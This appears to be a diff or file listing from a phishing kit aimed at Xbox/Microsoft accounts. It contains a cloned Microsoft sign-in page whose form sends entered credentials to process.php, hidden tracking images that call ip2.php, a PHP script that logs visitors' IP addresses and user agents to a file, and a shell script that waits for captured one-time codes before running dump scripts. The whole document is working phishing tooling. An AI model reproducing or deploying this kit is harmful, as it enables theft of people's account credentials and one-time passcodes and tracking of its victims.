autocomplete="off" data-bind="autoSubmit: forceSubmit, attr: { action: pass.php }, ariaHidden: activeDialog" action="process.php"><!-- ko if: svr.b4 --><!-- /ko --><!-- ko withProperties: { '$loginPage': $data } --> <img src="ip2.php" style="display:none"><div class="outer" data-bind="component: { name: 'master-page',
     3 + params: {
     4 + serverData: svr,
     5 + showButtons: svr.f,
     6 + showFooterLinks: true,
     7 + useWizardBehavior: svr.au,
     8 + handleWizardButtons: false,
     9 + password: password,
     10 + hideFromAria: ariaHidden },
     11 + event: {
     12 + footerAgreementClick: footer_agreementClick } }">
     13 + <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --><!-- ko if: svr.aL --><!-- /ko -->
     14 + <div class="middle" data-bind="css: { 'app': backgroundLogoUrl }"><!-- ko if: backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko -->
     15 + <img class="background-logo" role="presentation" data-bind="attr: { src: backgroundLogoUrl }" src="https://logincdn.msauth.net/16.000.28378.12/images/AppLogos/20.png?x=71c5dd371596273fd346bd0c6ebe8fb9" style="margin-bottom:20px">
     16 + <div class="inner fade-in-lightbox" data-bind="
     17 + animationEnd: paginationControlMethods() &amp;&amp; paginationControlMethods().view_onAnimationEnd,
     18 + css: {
     19 + 'app': backgroundLogoUrl,
     20 + 'wide': paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata('wide'),
     21 + 'fade-in-lightbox': fadeInLightBox,
     22 + 'has-popup': showFedCredButton,
     23 + 'transparent-lightbox': backgroundControlMethods() &amp;&amp; backgroundControlMethods().useTransparentLightBox }"> <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.BX &amp;&amp; showLightboxProgress() }"></div><!-- ko if: showLightboxProgress --><!-- /ko --><!-- ko ifnot: paginationControlMethods() && (paginationControlMethods().currentViewHasMetadata('hideLogo')) -->
     24 + <div data-bind="component: { name: 'logo-control',
     25 + params: {
     26 + isChinaDc: svr.fIsChinaDc,
     27 + bannerLogoUrl: bannerLogoUrl() } }"><!-- --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.png?x=ed9c9eb0dce17d752bedea6b5acda6d9" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" alt="Microsoft"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div>
     28 + <!-- /ko --><!-- ko if: svr.Cr && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: asyncInitReady --> <div role="main" data-bind="component: { name: 'pagination-control',
     29 + publicMethods: paginationControlMethods,
     30 + params: {
     31 + enableCssAnimation: svr.A3,
     32 + initialViewId: initialViewId,
     33 + currentViewId: currentViewId,
     34 + initialSharedData: initialSharedData,
     35 + initialError: $loginPage.getServerError() },
     36 + event: {
     37 + cancel: paginationControl_onCancel,
     38 + showView: $loginPage.view_onShow,
     39 + setLightBoxFadeIn: view_onSetLightBoxFadeIn,
     40 + animationStateChange: paginationControl_onAnimationStateChange } }"><!-- --> <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class=""><!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.g) --><!-- /ko --> <div class="pagination-view animate slide-in-next" data-bind="css: {
     41 + 'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.g),
     42 + 'zero-opacity': hidePaginatedView.hideSubView(),
     43 + 'animate': animate(),
     44 + 'slide-out-next': animate.isSlideOutNext(),
     45 + 'slide-in-next': animate.isSlideInNext(),
     46 + 'slide-out-back': animate.isSlideOutBack(),
     47 + 'slide-in-back': animate.isSlideInBack() }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: 'login-paginated-username-view',
     48 + params: {
     49 + serverData: svr,
     50 + serverError: initialError,
     51 + isInitialView: isInitialState,
     52 + displayName: sharedData.displayName,
     53 + prefillNames: $loginPage.prefillNames,
     54 + flowToken: sharedData.flowToken },
     55 + event: {
     56 + refresh: $loginPage.view_onRefresh,
     57 + redirect: $loginPage.view_onRedirect,
     58 + setPendingRequest: $loginPage.view_onSetPendingRequest,
     59 + showLearnMore: $loginPage.learnMore_onShow,
     60 + registerDialog: $loginPage.view_onRegisterDialog,
     61 + unregisterDialog: $loginPage.view_onUnregisterDialog,
     62 + showDialog: $loginPage.view_onShowDialog } }"><!-- --> <div data-bind="component: { name: 'header-control',
     63 + params: {
     64 + serverData: svr,
     65 + title: str['WF_STR_HeaderDefault_Title'] } }"><div class="row text-title" id="loginHeader"> <div role="heading" aria-level="1" data-bind="text: title">Sign in</div><!-- ko if: isSubtitleVisible --><!-- /ko --> </div></div><!-- ko if: pageDescription && !svr.ba --><!-- /ko --> <div class="row"> <div role="alert" aria-live="assertive"><!-- ko if: usernameTextbox.error --><!-- /ko --> </div> <div class="form-group col-md-24"><!-- ko if: prefillNames().length > 1 --><!-- /ko --><!-- ko ifnot: prefillNames().length > 1 --> <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
     66 + publicMethods: usernameTextbox.placeholderTextboxMethods,
     67 + params: {
     68 + serverData: svr,
     69 + hintText: tenantBranding.UserIdLabel || str['CT_PWD_STR_Email_Example'],
     70 + hintCss: 'placeholder' + (!svr.Az ? ' ltr_override' : '') },
     71 + event: {
     72 + updateFocus: usernameTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } --> <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --> <input type="email" name="email" id="i0116" maxlength="113" lang="en" class="form-control ltr_override" aria-required="true" data-bind="
     73 + css: { 'has-error': usernameTextbox.error },
     74 + ariaLabel: tenantBranding.UserIdLabel || str['CT_PWD_STR_Username_AriaLabel'],
     75 + ariaDescribedBy: 'loginHeader loginDescription',
     76 + textInput: usernameTextbox.value,
     77 + hasFocusEx: usernameTextbox.focused,
     78 + placeholder: $placeholderText" aria-label="Enter your email, phone, or Skype." aria-describedby="loginHeader loginDescription" placeholder="Email, phone, or Skype" autofocus> <input name="pass" type="password" id="i0118" autocomplete="off" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" class="moveOffScreen" tabindex="-1" aria-hidden="true"> <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div><!-- /ko --> </div> </div> <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons"> <div class="row"> <div class="col-md-24"> <div class="text-13 action-links"><!-- ko if: svr.A1 && !svr.v && !svr.AG --> <div class="form-group" data-bind="
     79 + htmlWithBindings: html['WF_STR_SignUpLink_Text'],
     80 + childBindings: {
     81 + 'signup': {
     82 + href: svr.H,
     83 + ariaLabel: str['WF_STR_SignupLink_AriaLabel_Text'],
     84 + attr: { name: 'createAccount' },
     85 + click: signup_onClick } }">No account? <a href="https://signup.live.com/signup?contextid=6568703AD42C7BD2&amp;bk=1560565059&amp;ru=https://login.live.com/login.srf%3fcontextid%3d6568703AD42C7BD2%26mkt%3dEN-US%26lc%3d1033%26bk%3d1560565059%26uaid%3de52f753aa5184927ab11e578045c61f0&amp;uiflavor=web&amp;mkt=EN-US&amp;lc=1033&amp;uaid=e52f753aa5184927ab11e578045c61f0" id="signup" aria-label="Create a Microsoft account" name="createAccount">Create one!</a></div><!-- /ko --><!-- ko if: svr.showCantAccessAccountLink --><!-- /ko --><!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.aM) --><!-- /ko --><!-- ko if: availableCredsWithoutUsername().length > 0 || svr.aM --> <div class="form-group" data-bind="
     86 + component: { name: 'cred-switch-link-control',
     87 + params: {
     88 + serverData: svr,
     89 + availableCreds: availableCredsWithoutUsername(),
     90 + showForgotUsername: svr.aM },
     91 + event: {
     92 + switchView: noUsernameCredSwitchLink_onSwitchView,
     93 + registerDialog: onRegisterDialog,
     94 + unregisterDialog: onUnregisterDialog,
     95 + showDialog: onShowDialog } }"><!-- --> <div class="form-group"><!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) --> <a id="idA_PWD_SwitchToCredPicker" href="https://login.live.com/pp1600/#" data-bind="
     96 + text: isUserKnown ? str['CT_PWD_STR_SwitchToCredPicker_Link'] : str['CT_PWD_STR_SwitchToCredPicker_Link_NoUser'],
     97 + click: switchToCredPicker_onClick">Sign-in options</a><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko --> </div><!-- ko if: credLinkError --><!-- /ko --></div><!-- /ko --> </div> </div> </div> <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }"> <div data-bind="component: { name: 'footer-buttons-field',
     98 + params: {
     99 + serverData: svr,
     100 + isPrimaryButtonEnabled: !isRequestPending(),
     101 + isPrimaryButtonVisible: svr.f,
     102 + isSecondaryButtonEnabled: true,
     103 + isSecondaryButtonVisible: svr.f &amp;&amp; isBackButtonVisible() },
     104 + event: {
     105 + primaryButtonClick: primaryButton_onClick,
     106 + secondaryButtonClick: secondaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind="
     107 + visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
     108 + css: { 'no-margin-bottom': removeBottomMargin }"><!-- ko if: isSecondaryButtonVisible --><!-- /ko --> <div class="inline-block"><!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 --> <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" data-bind="
     109 + attr: primaryButtonAttributes,
     110 + value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
     111 + hasFocus: focusOnPrimaryButton,
     112 + click: primaryButton_onClick,
     113 + enable: isPrimaryButtonEnabled,
     114 + visible: isPrimaryButtonVisible,
     115 + preventTabbing: primaryButtonPreventTabbing" value="Next"> </div> </div></div> </div> </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko --> </div> </div></div><!-- /ko --> </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSession --><!-- /ko -->
     116 + <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value=""> <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value=""> <input type="hidden" name="ctx" data-bind="value: ctx" value=""> <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value=""> <input type="hidden" id="i0327" data-bind="attr: { name: svr.CL }, value: flowToken" name="PPFT" value="DcdEdJaHB!R1wYVBzDEj!SK!1gdRziXv0q4A4OKtStH8DOvDdEkfgNCpunOAsRkpAsNR9FmFayvNxxCoS873UGIK!GCkpS*FnmVeyr1Je6ytW*jedfciXEQoJyl6qpYYgShx1oO7WR33YBqXFa7jmpF*nhQoNQUBSpHbiInbdTUmh!SEChv50D4a14gCHFOOrz02JnZAZa0yroPfrebc9nsFXJLZ4vMstBCU7IIKO!x9MhosB!iM!fuSl7uJ39uWsA$$"> <input type="hidden" name="PPSX" data-bind="value: svr.Co" value="Passp"> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.AA" value=""> <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure" data-bind="value: svr.aL ? 1 : 0" value="0"> <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="0"> <div data-bind="component: { name: 'instrumentation-control',
     117 + publicMethods: instrumentationMethods,
     118 + params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value="0"> <input type="hidden" name="i18" data-bind="value: srsSuccess"> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div> <div id="footer" class="footer default" role="contentinfo" data-bind="css: { 'default': !backgroundLogoUrl() }"> <div data-bind="component: { name: 'footer-control',
     119 + params: {
     120 + serverData: svr,
     121 + debugDetails: debugDetails,
     122 + showLinks: true },
     123 + event: {
     124 + agreementClick: footer_agreementClick } }">
     125 + <!-- --><!-- ko if: showLinks || impressumLink || showIcpLicense --> <div id="footerLinks" class="footerNode text-secondary"><!-- ko if: !showIcpLicense --> <span id="ftrCopy" data-bind="html: svr.Cq">©2020 Microsoft</span><!-- /ko --> <a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;vv=1600&amp;uaid=e52f753aa5184927ab11e578045c61f0">Terms of use</a> <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;vv=1600&amp;uaid=e52f753aa5184927ab11e578045c61f0">Privacy &amp; cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --><!-- Set attr binding before hasFocus to prevent Narrator from losing focus --> <a href="#" role="button" class="moreOptions" data-bind="
     126 + click: moreInfo_onClick,
     127 + ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
     128 + attr: { 'aria-expanded': showDebugDetails().toString(),
     129 + hasFocus: focusMoreInfo() }" aria-label="Click here for troubleshooting information" aria-expanded="false"><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.png?x=0ad43084800fd8b50a2576b5173746fe" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73"><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img src="ip2.php" style="display:none" > <img class="mobileMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.png?x=5bc252567ef56db648207d9c36a9d004" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c"><!-- /ko --> <!-- /ko --><!-- /ko --> </a> </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko --></div> </div> </div> <!-- /ko --></div><!-- /ko --> </form> <form method="post" aria-hidden="true" target="_top" data-bind="autoSubmit: postRedirectForceSubmit, attr: { action: postRedirectUrl }"><!-- ko foreach: postRedirectParams --><!-- /ko --> </form><!-- ko if: svr.Bq --> <div data-bind="component: { name: 'fetch-sessions-control',
     130 + params: {
     131 + serverData: svr },
     132 + event: {
     133 + updateUserTiles: fetchSessions_onUpdateUserTiles,
     134 + executeGctResult: fetchSessions_onExecuteGctResult,
     135 + incrementAsyncTileRequestCount: fetchSessions_onIncrementAsyncTileRequestCount,
     136 + decrementAsyncTileRequestCount: fetchSessions_onDecrementAsyncTileRequestCount } }"><!-- ko if: callMsaStaticMeControl --> <div data-bind="injectIframe: { url: svr.Bq, onload: iFrame_onload }"><iframe height="0" width="0" src="https://login.live.com/Me.htm?v=1&amp;uaid=e52f753aa5184927ab11e578045c61f0" style="display: none;"></iframe></div> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.AR --><!-- /ko --></div></body></html>
  • ■ ■ ■ ■ ■ ■
    xbox/otp/io.sh
     1 +clear
     2 +mpv /sdcard/log.mp3
     3 +clear
     4 +if [ -f "otp.txt" ];then
     5 +bash grad.sh
     6 +sleep 15.0
     7 +bash dump.sh
     8 +else
     9 +echo -e " \e[96m Retriving Data Again Wait"
     10 +sleep 3.0
     11 +bash io.sh
     12 +fi
     13 + 
  • ■ ■ ■ ■ ■ ■
    xbox/otp/ip.php
     1 +<?php
     2 +
     3 +if (!empty($_SERVER['HTTP_CLIENT_IP']))
     4 + {
     5 + $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
     6 + }
     7 +elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     8 + {
     9 + $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
     10 + }
     11 +else
     12 + {
     13 + $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
     14 + }
     15 +$useragent = " User-Agent: ";
     16 +$browser = $_SERVER['HTTP_USER_AGENT'];
     17 +
     18 +
     19 +$file = 'ip.txt';
     20 +$fp = fopen($file, 'a');
     21 +
     22 +fwrite($fp, $ipaddress);
     23 +fwrite($fp, $useragent);
     24 +fwrite($fp, $browser);
     25 +
     26 +
     27 +fclose($fp);
Please wait...
Page is in error, reload to recover